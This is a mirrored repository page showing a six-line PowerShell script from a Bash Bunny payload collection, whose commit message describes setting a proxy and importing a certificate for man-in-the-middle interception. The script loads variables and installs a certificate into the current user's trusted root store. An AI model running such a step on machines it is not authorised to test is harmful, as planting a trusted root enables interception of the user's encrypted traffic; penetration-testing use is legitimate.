mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
* Sets specified proxy and imports certificate for MITM * Update cert.pem * Update README.md * Update README.md * Update README.md * Update README.md * Update README.md * Update vars.ps1 * Update payload.txt * Update README.md * Update README.md
6 lines
216 B
PowerShell
6 lines
216 B
PowerShell
#Import variables from vars.ps1 for use.
|
|
. .\vars.ps1
|
|
|
|
#Add certificate to certificate store
|
|
$certFile = ( Get-ChildItem -Path $certName )
|
|
$certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root |